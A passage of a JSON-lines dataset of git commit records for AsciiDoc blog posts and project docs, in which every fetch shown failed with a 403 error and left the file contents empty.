2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b132ace5722a2dc6f8ea6d4699e9d376c9710202","subject":"List of actual ticket selling companies","message":"List of actual ticket 
selling companies\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"src\/main\/webapp\/realticketsales.adoc","new_file":"src\/main\/webapp\/realticketsales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTree\/TicketManorJava.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"902e8da8c49034ff5df51d821991e0b084edd082","subject":"Update 2017-05-22-Quao-facil-e-criar-um-plugin-para-Native-Script.adoc","message":"Update 2017-05-22-Quao-facil-e-criar-um-plugin-para-Native-Script.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-05-22-Quao-facil-e-criar-um-plugin-para-Native-Script.adoc","new_file":"_posts\/2017-05-22-Quao-facil-e-criar-um-plugin-para-Native-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b7d00ac920051f99c2c36c9de41492be3f11e33","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f2c4ce8c84718a67b95577f16f2b99e0fd0cae3","subject":"Update 2016-03-18-Watch-IllumiNations-live-on-Monday-night.adoc","message":"Update 2016-03-18-Watch-IllumiNations-live-on-Monday-night.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-18-Watch-IllumiNations-live-on-Monday-night.adoc","new_file":"_posts\/2016-03-18-Watch-IllumiNations-live-on-Monday-night.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7244c39ca7b544d91b793c202dc5a3239ede0b4","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94316d1d95a46328d7441fdba35c7a347776f33f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 
2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f41a908508cf5ae385fc1973e46e77daddbe1e27","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3519f19fb5a7d8c427ce7264c837a68a9b46b531","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c0514800aec0e452124dd9ac85b234230b6496d","subject":"Update 2016-06-22-DIY-security-camera-abstract.adoc","message":"Update 2016-06-22-DIY-security-camera-abstract.adoc","repos":"porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io","old_file":"_posts\/2016-06-22-DIY-security-camera-abstract.adoc","new_file":"_posts\/2016-06-22-DIY-security-camera-abstract.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/porolakka\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeaa0fca14f8811b0732c1777b1a13ecadca1393","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"825f6fec7e7582ba4ed3443803174f040c95f733","subject":"y2b create post A Very Strange Smartphone...","message":"y2b create post A Very Strange 
Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-30-A-Very-Strange-Smartphone.adoc","new_file":"_posts\/2016-03-30-A-Very-Strange-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88701967b8b59959e1652e8e24140b35b6dd6d7f","subject":"Update 2018-04-25-High-throughput-Consensus.adoc","message":"Update 2018-04-25-High-throughput-Consensus.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-25-High-throughput-Consensus.adoc","new_file":"_posts\/2018-04-25-High-throughput-Consensus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d29eaed453377b2d1531ed75fab1f630ff9eb566","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59a102d60beb4462b29705547ea64f1a49a100cb","subject":"y2b create post Xbox One Titanfall Bundle + Gran Turismo 6 - #Deals","message":"y2b create post Xbox One Titanfall Bundle + Gran Turismo 6 - #Deals","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-24-Xbox-One-Titanfall-Bundle--Gran-Turismo-6--Deals.adoc","new_file":"_posts\/2014-02-24-Xbox-One-Titanfall-Bundle--Gran-Turismo-6--Deals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7939f667e19418e323dcb4e375aacb6fa1c93768","subject":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","message":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a732bdc118cc34e1935f3ca4d7f08f9a51e7b67","subject":"y2b create post Unboxing Every Air Jordan Sneaker","message":"y2b create post Unboxing Every Air Jordan Sneaker","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-11-Unboxing-Every-Air-Jordan-Sneaker.adoc","new_file":"_posts\/2017-06-11-Unboxing-Every-Air-Jordan-Sneaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e75af6c9e274d3a058cda836f6770ec84133f67b","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86166dfbe3e26498657d166730f8ed4249d7c8f8","subject":"Create READMY.adoc","message":"Create READMY.adoc","repos":"DmitryKubahov\/VESB","old_file":"collections\/READMY.adoc","new_file":"collections\/READMY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DmitryKubahov\/VESB.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1aa62f89e968c3c504ae69b8ba7d25a658c16b03","subject":"Added Avro Dataformat to Gitbook","message":"Added Avro Dataformat to 
Gitbook\n","repos":"adessaigne\/camel,NickCis\/camel,acartapanis\/camel,tlehoux\/camel,Thopap\/camel,YoshikiHigo\/camel,zregvart\/camel,sverkera\/camel,Fabryprog\/camel,lburgazzoli\/camel,ssharma\/camel,sabre1041\/camel,alvinkwekel\/camel,nboukhed\/camel,snurmine\/camel,scranton\/camel,pkletsko\/camel,isavin\/camel,yuruki\/camel,dmvolod\/camel,NickCis\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,christophd\/camel,snurmine\/camel,bhaveshdt\/camel,ssharma\/camel,hqstevenson\/camel,isavin\/camel,yuruki\/camel,NickCis\/camel,jonmcewen\/camel,CodeSmell\/camel,davidkarlsen\/camel,anton-k11\/camel,jkorab\/camel,gilfernandes\/camel,acartapanis\/camel,sabre1041\/camel,sverkera\/camel,allancth\/camel,rmarting\/camel,anoordover\/camel,chirino\/camel,nboukhed\/camel,Fabryprog\/camel,Thopap\/camel,NickCis\/camel,neoramon\/camel,bgaudaen\/camel,gnodet\/camel,CodeSmell\/camel,dmvolod\/camel,pkletsko\/camel,kevinearls\/camel,akhettar\/camel,nicolaferraro\/camel,acartapanis\/camel,nikhilvibhav\/camel,rmarting\/camel,apache\/camel,bgaudaen\/camel,zregvart\/camel,drsquidop\/camel,drsquidop\/camel,sirlatrom\/camel,tadayosi\/camel,anoordover\/camel,RohanHart\/camel,acartapanis\/camel,alvinkwekel\/camel,bhaveshdt\/camel,curso007\/camel,scranton\/camel,yuruki\/camel,tlehoux\/camel,christophd\/camel,jkorab\/camel,allancth\/camel,gnodet\/camel,chirino\/camel,jonmcewen\/camel,Fabryprog\/camel,lburgazzoli\/apache-camel,jarst\/camel,jonmcewen\/camel,jamesnetherton\/camel,neoramon\/camel,tdiesler\/camel,ullgren\/camel,NickCis\/camel,gautric\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,nikhilvibhav\/camel,anton-k11\/camel,prashant2402\/camel,cunningt\/camel,RohanHart\/camel,neoramon\/camel,yuruki\/camel,jkorab\/camel,lburgazzoli\/apache-camel,ullgren\/camel,NickCis\/camel,gautric\/camel,pmoerenhout\/camel,ullgren\/camel,pax95\/camel,jonmcewen\/camel,JYBESSON\/camel,akhettar\/camel,tlehoux\/camel,prashant2402\/camel,pax95\/camel,tdiesler\/camel,neoramon\/camel,jamesnetherton\/camel,gautric\/camel,bgaudaen\/camel,JYBESSON\/camel,tkopczynski\/camel,mcollovati\/camel,sabre1041\/camel,gautric\/camel,scranton\/camel,apache\/camel,pax95\/camel,snurmine\/camel,christophd\/camel,isavin\/camel,cunningt\/camel,tkopczynski\/camel,tadayosi\/camel,driseley\/camel,alvinkwekel\/camel,jarst\/camel,chirino\/camel,gnodet\/camel,onders86\/camel,drsquidop\/camel,driseley\/camel,jamesnetherton\/camel,anton-k11\/camel,adessaigne\/camel,gilfernandes\/camel,bgaudaen\/camel,punkhorn\/camel-upstream,onders86\/camel,CodeSmell\/camel,rmarting\/camel
l,gilfernandes\/camel,chirino\/camel,sirlatrom\/camel,Thopap\/camel,davidkarlsen\/camel,davidkarlsen\/camel,tadayosi\/camel,tdiesler\/camel,hqstevenson\/camel,gilfernandes\/camel,mgyongyosi\/camel,tkopczynski\/camel,jonmcewen\/camel,sirlatrom\/camel,nicolaferraro\/camel,jamesnetherton\/camel,pmoerenhout\/camel,tkopczynski\/camel,nikhilvibhav\/camel,snurmine\/camel,dmvolod\/camel,bhaveshdt\/camel,kevinearls\/camel,objectiser\/camel,gautric\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,nikhilvibhav\/camel,anton-k11\/camel,prashant2402\/camel,cunningt\/camel,RohanHart\/camel,neoramon\/camel,yuruki\/camel,jkorab\/camel,lburgazzoli\/apache-camel,ullgren\/camel,NickCis\/camel,gautric\/camel,pmoerenhout\/camel,ullgren\/camel,pax95\/camel,jonmcewen\/camel,JYBESSON\/camel,akhettar\/camel,tlehoux\/camel,prashant2402\/camel,pax95\/camel,tdiesler\/camel,neoramon\/camel,jamesnetherton\/camel,gautric\/camel,bgaudaen\/camel,JYBESSON\/camel,tkopczynski\/camel,mcollovati\/camel,sabre1041\/camel,gautric\/camel,scranton\/camel,apache\/camel,pax95\/camel,snurmine\/camel,christophd\/camel,isavin\/camel,cunningt\/camel,tkopczynski\/camel,tadayosi\/camel,driseley\/camel,alvinkwekel\/camel,jarst\/camel,chirino\/camel,gnodet\/camel,onders86\/camel,drsquidop\/camel,driseley\/camel,jamesnetherton\/camel,anton-k11\/camel,adessaigne\/camel,gilfernandes\/camel,bgaudaen\/camel,punkhorn\/camel-upstream,onders86\/camel,CodeSmell\/camel,rmarting\/camel,RohanHart\/camel,bhaveshdt\/camel,ssharma\/camel,tadayosi\/camel,neoramon\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,zregvart\/camel,kevinearls\/camel,mgyongyosi\/camel,JYBESSON\/camel,drsquidop\/camel,lburgazzoli\/camel,tlehoux\/camel,sirlatrom\/camel,jarst\/camel,sabre1041\/camel,gilfernandes\/camel,ssharma\/camel,veithen\/camel,dmvolod\/camel,gilfernandes\/camel,mcollovati\/camel,allancth\/camel,snurmine\/camel,lburgazzoli\/camel,rmarting\/camel,apache\/camel,bhaveshdt\/camel,dmvolod\/camel,jkorab\/camel,objectiser\/camel,dmvolod\/camel,chirino\/camel,curso007\/camel,DariusX\/camel,objectiser\/camel,kevinearls\/camel,nboukhed\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,mcollovati\/camel,punkhorn\/camel-upstream,prashant2402\/camel","old_file":"components\/camel-avro\/src\/main\/docs\/avro-dataformat.adoc","new_file":"components\/camel-avro\/src\/main\/docs\/avro-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a33fc96c06f604a3a87b850871bef1b3397a6e5d","subject":"Update 2015-05-03-1553.adoc","message":"Update 2015-05-03-1553.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-05-03-1553.adoc","new_file":"_posts\/2015-05-03-1553.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5bccc8772964b636e4a5ac23261475d83d09b7f","subject":"Update 2015-04-15-Development-environment.adoc","message":"Update 2015-04-15-Development-environment.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-04-15-Development-environment.adoc","new_file":"_posts\/2015-04-15-Development-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef496f2084b48b51586901766a13876708cde2c","subject":"Update 2015-07-06-Hybris-E-commerce-suite.adoc","message":"Update 2015-07-06-Hybris-E-commerce-suite.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-06-Hybris-E-commerce-suite.adoc","new_file":"_posts\/2015-07-06-Hybris-E-commerce-suite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12f4b363d17c73324e1c37e73a084d0493dde234","subject":"Added Camel 2.20.2 release notes to docs","message":"Added Camel 2.20.2 release notes to docs\n","repos":"Fabryprog\/camel,onders86\/camel,davidkarlsen\/camel,anoordover\/camel,ullgren\/camel,pax95\/camel,objectiser\/camel,apache\/camel,CodeSmell\/camel,pax95\/camel,onders86\/camel,onders86\/camel,christophd\/camel,kevinearls\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,nikhilvibhav\/camel,CodeSmell\/camel,christophd\/camel,objectiser\/camel,mcollovati\/camel,pmoerenhout\/camel,pax95\/camel,cunningt\/camel,onders86\/camel,alvinkwekel\/camel,alvinkwekel\/camel,apache\/camel,christophd\/camel,pax95\/camel,zregvart\/camel,CodeSmell\/camel,onders86\/camel,tadayosi\/camel,ullgren\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,mcollovati\/camel,punkhorn\/camel-upstream,tadayosi\/camel,zregvart\/camel,sverkera\/camel,nicolaferraro\/camel,apache\/camel,tdiesler\/camel,pmoerenhout\/camel,nicolaferraro\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,anoordover\/camel,kevinearls\/camel,objectiser\/camel,anoordover\/camel,davidkarlsen\/camel,pmoerenhout\/camel,gnodet\/camel,adessaigne\/camel,DariusX\/camel,gnodet\/camel,punkhorn\/camel-upstream,ullgren\/camel,tdiesler\/camel,davidkarlsen\/camel,apache\/camel,Fabryprog\/camel,tadayosi\/camel,jamesnetherton\/camel,adessaigne\/camel,DariusX\/camel,DariusX\/camel,onders86\/camel,Fabryprog\/camel,gnodet\/camel,jamesnetherton\/camel,jamesnetherton\/camel,cunningt\/camel,apache\/camel,kevinearls\/camel,sverkera\/camel,adessaigne\/camel,cunningt\/camel,alvinkwekel\/camel,cunningt\/camel,christophd\/camel,zregvart\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,anoordover\/camel,zregvart\/camel,DariusX\/camel,jamesnetherton\/camel,jamesnetherton\/camel,cunningt\/camel,gnodet\/camel,kevinearls\/camel,jamesnetherton\/camel,cunningt\/camel,gnodet\/camel,kevinearls\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream
,Fabryprog\/camel,sverkera\/camel,sverkera\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,kevinearls\/camel,jamesnetherton\/camel,nicolaferraro\/camel,sverkera\/camel,christophd\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2202-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2202-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bd7717e8f444fe592b9449b4db5c760a29ece95","subject":"RTGOV-515 Provide information on how to intercept activity events from an OSGi application","message":"RTGOV-515 Provide information on how to intercept activity events from an OSGi application\n","repos":"objectiser\/rtgov,Governance\/rtgov,djcoleman\/rtgov,djcoleman\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov,Governance\/rtgov,Governance\/rtgov,objectiser\/rtgov,djcoleman\/rtgov,jorgemoralespou\/rtgov,djcoleman\/rtgov,Governance\/rtgov,jorgemoralespou\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov","old_file":"docs\/userguide\/en-US\/UGReportActivityInformation.asciidoc","new_file":"docs\/userguide\/en-US\/UGReportActivityInformation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Governance\/rtgov.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"407b2197f12f8aeb3a2d322a26e801631e19b038","subject":"Blog entry for April 1st.","message":"Blog entry for April 1st.\n","repos":"tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-01-1.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/2015-04-01-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bf4069932671650bd598a0819cd8b207463b042","subject":"Work in progress","message":"Work in 
progress","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/catalog-examples.adoc","new_file":"userguide\/tutorials\/catalog-examples.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"949c6fb2144bff54587f8839baf0f69a09433022","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7489ed71f1e7a89638c86f05300a2b37c5f5d7ca","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2d49375a588bc84ccb87e77ad7873f999a8be87","subject":"Update 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Update 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"_posts\/2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81d9a20a92fc95b7d3167a45b39ccb53077e7598","subject":"y2b create post The Perfect Battery Pack?","message":"y2b create post The Perfect Battery Pack?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-03-The-Perfect-Battery-Pack.adoc","new_file":"_posts\/2016-09-03-The-Perfect-Battery-Pack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4b05c1df87712fe3610eb6fc93f51135e83f218","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 
